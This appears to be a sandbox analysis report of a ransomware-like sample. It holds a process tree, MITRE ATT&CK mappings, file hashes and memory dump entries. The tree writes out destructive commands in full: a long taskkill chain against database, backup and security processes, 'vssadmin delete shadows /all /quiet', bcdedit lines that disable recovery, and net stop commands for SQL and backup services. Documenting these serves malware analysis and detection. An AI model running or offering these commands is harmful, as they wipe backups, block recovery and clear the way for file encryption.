- - C:\Windows\SysWOW64\cmd.exe
    cmd /c "color e & @taskkill /IM ThunderPlatform.exe /F & @taskkill /IM iexplore.exe /F & @taskkill /IM vm-agent.exe /F & @taskkill /IM vm-agent-daemon.exe /F & @taskkill /IM eSightService.exe /F & @taskkill /IM cygrunsrv.exe /F & @taskkill /IM wrapper.exe /F & @taskkill /IM nginx.exe /F & @taskkill /IM node.exe /F & @taskkill /IM sshd.exe /F & @taskkill /IM vm-tray.exe /F & @taskkill /IM iempwatchdog.exe /F & @taskkill /IM sqlwriter.exe /F & @taskkill /IM php.exe /F & @taskkill /IM "notepad++.exe" /F & @taskkill /IM "phpStudy.exe" /F & @taskkill /IM OPCClient.exe /F & @taskkill /IM navicat.exe /F & @taskkill /IM SupportAssistAgent.exe /F & @taskkill /IM SunloginClient.exe /F & @taskkill /IM SOUNDMAN.exe /F & @taskkill /IM WeChat.exe /F & @taskkill /IM TXPlatform.exe /F & @taskkill /IM Tencentdll.exe /F & @taskkill /IM httpd.exe /F & @taskkill /IM jenkins.exe /F & @taskkill /IM QQ.exe /F & @taskkill /IM HaoZip.exe /F & @taskkill /IM HaoZipScan.exe /F & @taskkill /IM navicat.exe /F & @taskkill /IM TSVNCache.exe /F & @taskkill /IM RAVCpl64.exe /F & @taskkill /IM secbizsrv.exe /F & @taskkill /IM aliwssv.exe /F & @taskkill /IM Helper_Haozip.exe /F & @taskkill /IM acrotray.exe /F & @taskkill /IM "FileZilla Server Interface.exe" /F & @taskkill /IM YoudaoNote.exe /F & @taskkill /IM YNoteCefRender.exe /F & @taskkill /IM idea.exe /F & @taskkill /IM fsnotifier.exe /F & @taskkill /IM picpick.exe /F & @taskkill /IM lantern.exe /F & @taskkill /IM sysproxy-cmd.exe /F & @taskkill /IM service.exe /F & @taskkill /IM pcas.exe /F & @taskkill /IM PresentationFontCache.exe /F & @taskkill /IM RtWlan.exe /F & @taskkill /IM monitor.exe /F & @taskkill /IM Correspond.exe /F & @taskkill /IM ChatServer.exe /F & @taskkill /IM InetMgr.exe /F & @taskkill /IM LogonServer.exe /F & @taskkill /IM GameServer.exe /F & @taskkill /IM ServUAdmin.exe /F & @taskkill /IM ServUDaemon.exe /F & @taskkill /IM update0.exe /F & @taskkill /IM server.exe /F & @taskkill /IM w3wp.exe /F & @taskkill /IM notepad.exe /F & @taskkill /IM PalmInputService.exe /F & @taskkill /IM PalmInputGuard.exe /F & @taskkill /IM UpdateServer.exe /F & @taskkill /IM UpdateGate.exe /F & @taskkill /IM DBServer.exe /F & @taskkill /IM LoginGate.exe /F & @taskkill /IM SelGate.exe /F & @taskkill /IM RunGate.exe /F & @taskkill /IM M2Server.exe /F & @taskkill /IM LogDataServer.exe /F & @taskkill /IM LoginSrv.exe /F & @taskkill /IM sqlceip.exe /F & @taskkill /IM mqsvc.exe /F & @taskkill /IM RefundOrder.exe /F & @taskkill /IM ClamTray.exe /F & @taskkill /IM AdobeARM.exe /F & @taskkill /IM veeam.backup.shell.exe /F & @taskkill /IM VpxClient.exe /F & @taskkill /IM vmware-vmrc.exe /F & @taskkill /IM DSCPatchService.exe /F & @taskkill /IM scktsrvr.exe /F & @taskkill /IM ServerManager.exe /F & @taskkill /IM Dispatcher.exe /F & @taskkill /IM EFDispatcher.exe /F & @taskkill /IM sqlceip.exe /F & @taskkill /IM mqsvc.exe /F & @taskkill /IM RefundOrder.exe /F & @taskkill /IM ClamTray.exe /F & @taskkill /IM AdobeARM.exe /F & @taskkill /IM veeam.backup.shell.exe /F & @taskkill /IM VpxClient.exe /F & @taskkill /IM vmware-vmrc.exe /F & @taskkill /IM DSCPatchService.exe /F & @taskkill /IM scktsrvr.exe /F & @taskkill /IM ServerManager.exe /F & @taskkill /IM Dispatcher.exe /F & @taskkill /IM EFDispatcher.exe /F & @taskkill /IM ClamWin.exe /F & @taskkill /IM srvany.exe /F & @taskkill /IM JT_AG-8332.exe /F & @taskkill /IM XXTClient.exe /F & @taskkill /IM clean.exe /F & @taskkill /IM sqlservr.exe /F & @taskkill /IM "Net.Service.exe" /F & @taskkill /IM plsqldev.exe /F & @taskkill /IM splwow64.exe /F & @taskkill /IM Oobe.exe /F & @taskkill /IM QQYService.exe /F & @taskkill /IM sqlservr.exe /F & @taskkill /IM SGTool.exe /F & @taskkill /IM postgres.exe /F & @taskkill /IM AppVShNotify.exe /F & @taskkill /IM OfficeClickToRun.exe /F & @taskkill /IM EntDT.exe /F & @taskkill /IM EntPublish.exe /F"
    3⤵
    PID:4164
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM ThunderPlatform.exe /F
      4⤵
      PID:4904
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM iexplore.exe /F
      4⤵
      PID:4460
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM vm-agent.exe /F
      4⤵
      PID:2464
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM vm-agent-daemon.exe /F
      4⤵
      PID:4484
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM eSightService.exe /F
      4⤵
      Suspicious use of WriteProcessMemory
      PID:3260
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM cygrunsrv.exe /F
      4⤵
      PID:4472
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM wrapper.exe /F
      4⤵
      PID:4624
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM nginx.exe /F
      4⤵
      PID:1544
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM node.exe /F
      4⤵
      PID:1856
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM sshd.exe /F
      4⤵
      PID:2620
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM vm-tray.exe /F
      4⤵
      PID:4472
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM iempwatchdog.exe /F
      4⤵
      PID:3768
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM sqlwriter.exe /F
      4⤵
      PID:5104
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM php.exe /F
      4⤵
      PID:3736
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM "notepad++.exe" /F
      4⤵
      Kills process with taskkill
      PID:4852
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM "phpStudy.exe" /F
      4⤵
      PID:4520
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM OPCClient.exe /F
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:4484
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM navicat.exe /F
      4⤵
      PID:2592
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM SupportAssistAgent.exe /F
      4⤵
      PID:4840
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM SunloginClient.exe /F
      4⤵
      Kills process with taskkill
      PID:4216
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM SOUNDMAN.exe /F
      4⤵
      PID:1536
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM WeChat.exe /F
      4⤵
      PID:1544
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM TXPlatform.exe /F
      4⤵
      PID:3692
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM Tencentdll.exe /F
      4⤵
      PID:4532
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM httpd.exe /F
      4⤵
      PID:4960
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM jenkins.exe /F
      4⤵
      PID:724
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM QQ.exe /F
      4⤵
      PID:4876
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM HaoZip.exe /F
      4⤵
      PID:4796
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM HaoZipScan.exe /F
      4⤵
      PID:4948
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM navicat.exe /F
      4⤵
      PID:5092
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM TSVNCache.exe /F
      4⤵
      PID:4380
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM RAVCpl64.exe /F
      4⤵
      PID:4424
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM secbizsrv.exe /F
      4⤵
      PID:2148
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM aliwssv.exe /F
      4⤵
      PID:2920
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM Helper_Haozip.exe /F
      4⤵
      PID:1296
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM acrotray.exe /F
      4⤵
      PID:4896
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM "FileZilla Server Interface.exe" /F
      4⤵
      PID:3200
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM YoudaoNote.exe /F
      4⤵
      PID:1604
- C:\Users\Admin\AppData\Local\Temp\InternalCrossContextDelega.exe
  "C:\Users\Admin\AppData\Local\Temp\InternalCrossContextDelega.exe"
  2⤵
  PID:1604
- C:\Users\Admin\AppData\Local\Temp\InternalCrossContextDelega.exe
  "C:\Users\Admin\AppData\Local\Temp\InternalCrossContextDelega.exe"
  2⤵
  PID:1936
- C:\Users\Admin\AppData\Local\Temp\InternalCrossContextDelega.exe
  "C:\Users\Admin\AppData\Local\Temp\InternalCrossContextDelega.exe"
  2⤵
  PID:1052
- C:\Users\Admin\AppData\Local\Temp\InternalCrossContextDelega.exe
  "C:\Users\Admin\AppData\Local\Temp\InternalCrossContextDelega.exe"
  2⤵
  PID:716
- C:\Users\Admin\AppData\Local\Temp\InternalCrossContextDelega.exe
  "C:\Users\Admin\AppData\Local\Temp\InternalCrossContextDelega.exe"
  2⤵
  - Modifies extensions of user files
  - Enumerates connected drives
  - Drops file in Program Files directory
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:740
- - C:\Windows\System32\vssadmin.exe
    "C:\Windows\sysnative\vssadmin.exe" delete shadows /all /quiet
    3⤵
    - Interacts with shadow copies
    PID:3764
- - C:\Windows\System32\cmd.exe
    "C:\Windows\sysnative\cmd.exe" /c bcdedit /set {current} bootstatuspolicy ignoreallfailures
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3268
  - - C:\Windows\system32\bcdedit.exe
      bcdedit /set {current} bootstatuspolicy ignoreallfailures
      4⤵
      Modifies boot configuration data using bcdedit
      PID:2232
- - C:\Windows\System32\cmd.exe
    "C:\Windows\sysnative\cmd.exe" /c bcdedit /set {current} recoveryenabled no
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3032
  - - C:\Windows\system32\bcdedit.exe
      bcdedit /set {current} recoveryenabled no
      4⤵
      Modifies boot configuration data using bcdedit
      PID:1812

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
PID:1772
- C:\Windows\SysWOW64\net1.exe
  C:\Windows\system32\net1 stop xenlite
  2⤵
  PID:4540

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop "SQLTELEMETRY"
1⤵
PID:300

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
1⤵
PID:612

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop "NetBackup Client Service"
1⤵
PID:4840

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop "NetBackup Legacy Client Service"
1⤵
PID:4648

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop "MSSQLServerADHelper100"
1⤵
PID:3416

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop "Synology Drive VSS Service x64"
1⤵
PID:4540

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSComplianceAudit
1⤵
PID:4468

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSExchangeADTopology
1⤵
PID:2464

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop WebAttendServer
1⤵
PID:2156

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop "MSSQL$OPTIMA"
1⤵
PID:5068

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop TPlusStdAppService1300
1⤵
PID:2592

C:\Windows\system32\wbem\WMIADAP.EXE
wmiadap.exe /F /T /R
1⤵
PID:696

C:\Windows\system32\wbem\wmiprvse.exe
C:\Windows\system32\wbem\wmiprvse.exe -Embedding
1⤵
PID:4528

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Modify Existing Service

T1031

Privilege Escalation

Defense Evasion

File Deletion

T1107

Impair Defenses

T1562

Credential Access

Discovery

Peripheral Device Discovery

T1120

Query Registry

T1012

Remote System Discovery

T1018

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Inhibit System Recovery

T1490

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\F.bat

MD5
41bcad545aaf08d4617c7241fe36267c

SHA1
fdcbb1e633c4a07a55ad0779f0c4d24bb1af830d

SHA256
9820bab84c400a37a46db96d999335bf2fb67623931eac0a1a3e99aa19a90b87

SHA512
1501232e89b2f706c34b745134778713dd529e4b20e5343ca7f9e25e60ba0376cc2d4dfd943e96f72d2af6f4abe5cf7632a826b92b00d38425e744ae43517724

Download Submit
memory/300-164-0x0000000000000000-mapping.dmp

Download
memory/304-191-0x0000000000000000-mapping.dmp

Download
memory/308-165-0x0000000000000000-mapping.dmp

Download
memory/372-151-0x0000000000000000-mapping.dmp

Download
memory/380-178-0x0000000000000000-mapping.dmp

Download
memory/412-173-0x0000000000000000-mapping.dmp

Download
memory/416-155-0x0000000000000000-mapping.dmp

Download
memory/612-188-0x0000000000000000-mapping.dmp

Download
memory/612-169-0x0000000000000000-mapping.dmp

Download
memory/616-171-0x0000000000000000-mapping.dmp

Download
memory/716-177-0x0000000000000000-mapping.dmp

Download
memory/724-175-0x0000000000000000-mapping.dmp

Download
memory/736-174-0x0000000000000000-mapping.dmp

Download
memory/740-129-0x0000000000400000-0x0000000000428000-memory.dmp

Filesize
160KB

Download
memory/740-128-0x000000000040AF56-mapping.dmp

Download
memory/740-127-0x0000000000400000-0x0000000000428000-memory.dmp

Filesize
160KB

Download
memory/796-172-0x0000000000000000-mapping.dmp

Download
memory/896-156-0x0000000000000000-mapping.dmp

Download
memory/896-192-0x0000000000000000-mapping.dmp

Download
memory/980-167-0x0000000000000000-mapping.dmp

Download
memory/1088-143-0x0000000000000000-mapping.dmp

Download
memory/1212-180-0x0000000000000000-mapping.dmp

Download
memory/1228-148-0x0000000000000000-mapping.dmp

Download
memory/1496-144-0x0000000000000000-mapping.dmp

Download
memory/1536-162-0x0000000000000000-mapping.dmp

Download
memory/1620-181-0x0000000000000000-mapping.dmp

Download
memory/1668-150-0x0000000000000000-mapping.dmp

Download
memory/1740-166-0x0000000000000000-mapping.dmp

Download
memory/1804-186-0x0000000000000000-mapping.dmp

Download
memory/1812-158-0x0000000000000000-mapping.dmp

Download
memory/1812-137-0x0000000000000000-mapping.dmp

Download
memory/1836-145-0x0000000000000000-mapping.dmp

Download
memory/1952-154-0x0000000000000000-mapping.dmp

Download
memory/2056-157-0x0000000000000000-mapping.dmp

Download
memory/2060-136-0x0000000000000000-mapping.dmp

Download
memory/2140-146-0x0000000000000000-mapping.dmp

Download
memory/2232-159-0x0000000000000000-mapping.dmp

Download
memory/2232-138-0x0000000000000000-mapping.dmp

Download
memory/2352-135-0x0000000000000000-mapping.dmp

Download
memory/2592-160-0x0000000000000000-mapping.dmp

Download
memory/2648-126-0x0000000000000000-mapping.dmp

Download
memory/2668-189-0x0000000000000000-mapping.dmp

Download
memory/2704-179-0x0000000000000000-mapping.dmp

Download
memory/2724-184-0x0000000000000000-mapping.dmp

Download
memory/2816-161-0x0000000000000000-mapping.dmp

Download
memory/2828-152-0x0000000000000000-mapping.dmp

Download
memory/2832-153-0x0000000000000000-mapping.dmp

Download
memory/2844-170-0x0000000000000000-mapping.dmp

Download
memory/2932-149-0x0000000000000000-mapping.dmp

Download
memory/2948-141-0x0000000000000000-mapping.dmp

Download
memory/2952-185-0x0000000000000000-mapping.dmp

Download
memory/2968-163-0x0000000000000000-mapping.dmp

Download
memory/2968-142-0x0000000000000000-mapping.dmp

Download
memory/3032-134-0x0000000000000000-mapping.dmp

Download
memory/3260-139-0x0000000000000000-mapping.dmp

Download
memory/3268-133-0x0000000000000000-mapping.dmp

Download
memory/3312-182-0x0000000000000000-mapping.dmp

Download
memory/3500-176-0x0000000000000000-mapping.dmp

Download
memory/3532-190-0x0000000000000000-mapping.dmp

Download
memory/3736-131-0x0000000000000000-mapping.dmp

Download
memory/3764-132-0x0000000000000000-mapping.dmp

Download
memory/3800-125-0x000000000ADE0000-0x000000000AE32000-memory.dmp

Filesize
328KB

Download
memory/3800-119-0x0000000007500000-0x0000000007592000-memory.dmp

Filesize
584KB

Download
memory/3800-122-0x0000000007750000-0x000000000775E000-memory.dmp

Filesize
56KB

Download
memory/3800-121-0x0000000007460000-0x000000000795E000-memory.dmp

Filesize
5.0MB

Download
memory/3800-117-0x0000000000730000-0x00000000007A0000-memory.dmp

Filesize
448KB

Download
memory/3800-116-0x0000000000730000-0x00000000007A0000-memory.dmp

Filesize
448KB

Download
memory/3800-124-0x000000000AC40000-0x000000000ACDC000-memory.dmp

Filesize
624KB

Download
memory/3800-120-0x00000000074A0000-0x00000000074AA000-memory.dmp

Filesize
40KB

Download
memory/3800-123-0x000000000AB50000-0x000000000AB9B000-memory.dmp

Filesize
300KB

Download
memory/3800-118-0x0000000007960000-0x0000000007E5E000-memory.dmp

Filesize
5.0MB

Download
memory/3860-147-0x0000000000000000-mapping.dmp

Download
memory/3860-187-0x0000000000000000-mapping.dmp

Download
memory/3996-183-0x0000000000000000-mapping.dmp

Download
memory/4012-140-0x0000000000000000-mapping.dmp

Download
memory/4084-168-0x0000000000000000-mapping.dmp

Download